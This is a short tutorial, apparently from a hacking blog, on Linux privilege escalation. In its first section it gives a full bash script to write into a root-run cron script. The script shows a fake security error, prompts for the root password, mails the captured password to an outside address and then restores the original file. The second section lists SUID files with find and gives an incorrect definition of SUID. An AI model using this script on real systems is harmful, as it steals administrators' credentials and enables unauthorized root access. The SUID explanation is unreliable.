1 – Looking for Custom Cron Tab Scripts
Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.
First, check out if there are any Cron Job Tasks:
crontab -lIf you see any Custom Script, we must Check out if we can Write on it.
Let’s say we got a Custom script here: /bin/cronscript
To check if we can Write a File, type:
(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)Let’s edit the file and send a Fake Error Message.
Make a Copy of the Original Script to /bin/cronscript.bak:
cp /bin/cronscript /bin/cronscript.bak
echo “An System Error Occured!”
echo “Error Code: #131425″
echo “Update to get the Latest Patch for this Security Issue.”
read -s -p “[sudo] password for root ” rootpasswd
echo “su: Authentication failure”
sudo apt-get update && sudo apt-get upgrade
sudo echo “The Password is: $rootpasswd” > .kod
mail -s “Root’s Password” “email@example.com” < .kod
mv cronscript.bak cronscript
After you save the File, type: chmod +x cronscript to set it as Executable!
This script will:
- Send a Fake Error Message
- Request for the Root’s Password
- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)
- Restore the Original File
When the Script gets Executed, the Root User will Enter his Password and it will be send to you!
It would be better if you had some knowledge on Bash Programming…
2 – Enumerating all SUID Files
An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you: You can Escalate Priviliges in this way, if it is in an Important Directory.
As before, you can Social-Engineer a Privileged User.
To find all SUID Files, type:
find / -user root -perm -4000 -printThis will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!.